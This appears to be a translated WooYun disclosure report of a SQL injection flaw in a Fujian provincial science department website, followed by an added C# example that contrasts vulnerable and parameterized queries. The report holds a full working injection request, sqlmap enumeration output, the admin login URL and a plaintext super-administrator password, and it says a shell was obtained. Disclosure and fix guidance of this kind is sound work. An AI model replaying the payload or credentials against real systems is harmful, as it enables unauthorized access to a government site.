Vulnerability summary

Defect ID: wooyun-2015-0112231

Title: SQL injection on a site of the Fujian Provincial Department of Science and Technology

Vendor: Fujian Provincial Department of Science and Technology

Author: wclqust

Submitted: 2015-05-20 17:30

Fixed: 2015-07-09 11:00

Published: 2015-07-09 11:00

Type: SQL injection

Severity: High

Self-rated Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-20: details sent to the vendor, awaiting vendor handling
2015-05-25: vendor confirmed; details visible to the vendor only
2015-06-04: details disclosed to core white hats and domain experts
2015-06-14: details disclosed to regular white hats
2015-06-24: details disclosed to intern white hats
2015-07-09: details disclosed to the public

Brief description:

The Fujian Spark Network site of the Fujian Provincial Department of Science and Technology has a SQL injection vulnerability. The database can be dumped, the admin backend can be entered as super administrator, the database connection runs as the sa user, and a shell can be obtained.

Detailed description:

1. Injection URL and parameter. The injection point is the "txtKeyWorld" parameter.
PoC:
http://www.fjsp.gov.cn:80/web/Xmxx.aspx (POST)
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKLTU5MjYxMTk4Ng9kFgJmD2QWAgIDD2QWCAIPDxAPFgYeDURhdGFUZXh0RmllbGQFCHR5cGVuYW1lHg5EYXRhVmFsdWVGaWVsZAUGdHlwZUlEHgtfIURhdGFCb3VuZGdkEBUGEi0tLeaJgOacieagj%2Bebri0tLQzmlrDpl7vnrqHnkIYM5pif54Gr5Yqo5oCBDOaUv%2BetluazleinhAzmmJ/ngavnp5HmioAM6Ie05a%2BM5L%2Bh5oGvFQYBMAExATIBMwE0ATUUKwMGZ2dnZ2dnFgFmZAIRDxBkEBUBEi0tLeaJgOacieWGheWuuS0tLRUBATAUKwMBZ2RkAhcPZBYCAgsPPCsADQEADxYEHwJnHgtfIUl0ZW1Db3VudAJEZBYCZg9kFihmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAmYPZBYCZg8VAgI3NDbnpo/lu7rnnIHlhpzmnZHnp5HmioDkv6Hmga/otYTmupDlhbHkuqvkuI7mnI3liqHlubPlj7BkAgIPZBYCZg9kFgJmDxUCAjczOemyn%2BmxvOS6uuW3pee5geiCsuWSjOmxvOexvemFseW8gOWPkeaKgOacr%2BeglOeptuS4juekuuiMg2QCAw9kFgJmD2QWAmYPFQICNzIw6YCf55Sf5p6X5Zyw5Lu/6YeO55Sf56eN5qSN54G16Iqd56S66IyD5LiO5o6o5bm/ZAIED2QWAmYPZBYCZg8VAgI3MTzmlL/lkozljr/igJzmlL/lkoznmb3ojLbigJ3kuqfkuJrljJblhbPplK7mioDmnK/noJTnqbbnpLrojINkAgUPZBYCZg9kFgJmDxUCAjcwJOaYjua6quWkqeeEtuiNr%2BeJqeS6p%2BS4muenkeaKgOekuuiMg2QCBg9kFgJmD2QWAmYPFQICNjk86aOf55So6I%2BM5paw5ZOB56eN6YCJ6IKy5Y%2BK5a6J5YWo55Sf5Lqn5oqA5pyv56CU56m25LiO56S66IyDZAIHD2QWAmYPZBYCZg8VAgI2ODzljZflronluILnsq7msrnpo5/lk4Hmt7HliqDlt6XmioDmnK/lvIDlj5Hlj4rkuqfkuJrljJbnpLrojINkAggPZBYCZg9kFgJmDxUCAjY3LeW7tuW5s%2BWMuuaon%2BWxnuWkqeeEtummmeaWmeS6p%2BS4muenkeaKgOekuuiMg2QCCQ9kFgJmD2QWAmYPFQICNjY26Zye5rWm5Y6/5aSn5by55raC6bG85Lq65bel6IKy6IuX5Y%2BK5YW75q6W5oqA5pyv56S66IyDZAIKD2QWAmYPZBYCZg8VAgI2NTDov57ln47nuqLlv4PlnLDnk5zkuqfkuJrpk77np5HmioDliJvmlrDkuI7npLrojINkAgsPZBYCZg9kFgJmDxUCAjY0OeW7uueTr%2BW4guerueexu%2Bi1hOa6kOe7vOWQiOWIqeeUqOWFs%2BmUruaKgOacr%2BW8gOWPkeekuuiMg2QCDA9kFgJmD2QWAmYPFQICNjM/5Z%2BO5Y6i5Yy66I%2By5b6L5a6%2B6Juk5LuU6Imv56eN6YCJ6IKy5ZKM5YGl5bq35YW75q6W5oqA5pyv56S66IyDZAIND2QWAmYPZBYCZg8VAgI2MkXojZTln47ljLrml6DlhazlrrPolKzoj5zvvIjpo5/nlKjoj4zvvInns7vliJfkuqflk4HliqDlt6XmioDmnK/npLrojINkAg4PZBYCZg9kFgJmDxUCAjYxLeaymeWOv%2BWGnOWJr%2BS6p%2BWTgeeyvua3seWKoOW3peS6p%2BS4muWMluekuuiMg2QCDw9kFgJmD2QWAmYPFQICNjAq6JWJ5Z%2BO5Yy65LyY5Yq/55Wc54mn5Lia5Lqn5Lia6ZuG576k5bu66K6%2BZAIQD
2QWAmYPZBYCZg8VAgI1OTcg5pS/5ZKM55m96Iy2546w5Luj55Sf5Lqn5oqA5pyv6ZuG5oiQ5LiO5Lqn5Lia5YyW56S66IyDZAIRD2QWAmYPZBYCZg8VAgI1ODDov57msZ/ljr/lpKflvLnmtoLpsbzop4TojIPljJblhbvmrpbmioDmnK/npLrojINkAhIPDxYCHwRoZGQCEw9kFgJmD2QWCmYPDxYCHgRUZXh0BQE0ZGQCAQ8PFgIfBQUBMWRkAgIPDxYCHwUFAjE3ZGQCAw8PFgIfBGhkZAIEDw8WAh8EaGRkAhkPDxYCHwUFBzQyNzI1MjVkZBgBBSNjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJEdyaWRWaWV3MQ88KwAKAQgCBGS/h%2B0ivNLswCELWhLGE%2BtIO6MbXA%3D%3D&__VIEWSTATEGENERATOR=2B05F96C&__EVENTVALIDATION=/wEWGwKP1LDgAgL32/PyCwLVzJXYCgKg7emrBgLdp/a7DQLaxcs/Asqq4dEMAtWq4dEMAtSq4dEMAteq4dEMAtaq4dEMAtGq4dEMArKlwcsBAs3mwYcOAuXbjIoMAqyXxrIJAq2XxrIJAq6XxrIJAq%2BXxrIJAuX%2BgewOAqzo7/sOAqGVwa0EAqa4yuADAozE/IANAqCf2ZQEAvX4hv0IAvjjhcEPfjGyXTYznABIJjUSGdrUV9TvjxI%3D&ctl00$txtUserName=&ctl00$txtPwd=&ctl00$DrLangMu=0&ctl00$DrMeiRong=0&ctl00$txtSelect=&ctl00$ContentPlaceHolder1$DrType=1&ctl00$ContentPlaceHolder1$txtKeyWorld=aa' or '1%25'%3D'1&ctl00$ContentPlaceHolder1$txtBegin=&ctl00$ContentPlaceHolder1$txtEnd=&ctl00$ContentPlaceHolder1$btSelect=%E6%9F%A5%E6%89%BE&ctl00$ContentPlaceHolder1$GridView1$ctl20$txtNewPageIndex=1
2. Dumping the database (sqlmap output):
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [8]:
[*] city
[*] fjspDB
[*] LwDataBase
[*] master
[*] model
[*] msdb
[*] tempdb
[*] TwfDataBase
3. Listing the tables of the current database (fjspDB):
Database: fjspDB
[20 tables]
+-------------------------------+
| NewsList |
| ViewUserRole |
| fjip_Item |
| fjsp_NewComment |
| fjsp_News |
| fjsp_NewsType |
| fjsp_RolePermissions |
| fjsp_User |
| fjsp_UserRole |
| sysdiagrams |
| t_xinghuo_authenticate |
| t_xinghuo_bearproj |
| t_xinghuo_companyinfo |
| t_xinghuo_companyinfo_honor |
| t_xinghuo_projachievementinfo |
| t_xinghuo_projinfo |
| t_xinghuo_richtopic |
| t_xinghuo_stpeople |
| t_xinghuo_stproj |
| t_xinghuo_winningachi
4. Retrieve the super administrator account from fjsp_User and log in to the backend.
Address: http://www.fjsp.gov.cn/admin
Username/password: superadmin/1q2w3e\
5. Obtained an interactive shell through sqlmap; did not go any further.

Proof of vulnerability:

[Screenshot: 1.png]

[Screenshot: 2.png]

Remediation:

Implement anti-injection measures.
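The report's remediation advice is a single phrase, so here is an added example (not the report's or the site's own code, and the column names ProjId and Title are assumptions) showing a hypothetical ASP.NET search handler for the txtKeyWorld field: first the string-concatenation form that makes the payload `aa' or '1%'='1` a valid query, then the parameterized form that closes the injection.

```csharp
// Added example, not code from the report or the affected site.
// Table t_xinghuo_projinfo is named in the report; the columns ProjId and
// Title are assumed for illustration.
using System;
using System.Data;
using System.Data.SqlClient;

public static class ProjectSearch
{
    // VULNERABLE (for contrast): the keyword is spliced into the SQL text.
    // With txtKeyWorld = "aa' or '1%'='1" the WHERE clause becomes
    //   WHERE Title LIKE '%aa' or '1%'='1%'
    // which is always true and lets the caller control the statement.
    public static string BuildUnsafeSql(string keyword)
    {
        return "SELECT ProjId, Title FROM t_xinghuo_projinfo "
             + "WHERE Title LIKE '%" + keyword + "%'";
    }

    // Escape LIKE wildcards so a keyword such as "100%" matches literally.
    // SQL Server honors ESCAPE '\' for %, _ and [.
    static string EscapeLike(string s) =>
        s.Replace(@"\", @"\\").Replace("%", @"\%")
         .Replace("_", @"\_").Replace("[", @"\[");

    // FIXED: the keyword travels as a typed parameter, never as SQL text,
    // so quotes in it cannot terminate the string literal.
    // The connection string should use a least-privilege login, not sa,
    // so that a future bug cannot reach other databases or run OS commands.
    public static DataTable SearchProjects(string connectionString, string keyword)
    {
        const string sql =
            "SELECT ProjId, Title FROM t_xinghuo_projinfo "
          + "WHERE Title LIKE @pattern ESCAPE '\\'";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value =
                "%" + EscapeLike(keyword ?? string.Empty) + "%";
            var table = new DataTable();
            conn.Open();
            using (var reader = cmd.ExecuteReader())
                table.Load(reader);
            return table;
        }
    }
}
```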

Copyright notice: please credit the source when reposting: wclqust@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed at: 2015-05-25 10:59

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded through CNCERT to the Fujian branch center, which will coordinate handling with the unit that administers the website.

Latest status:

None yet

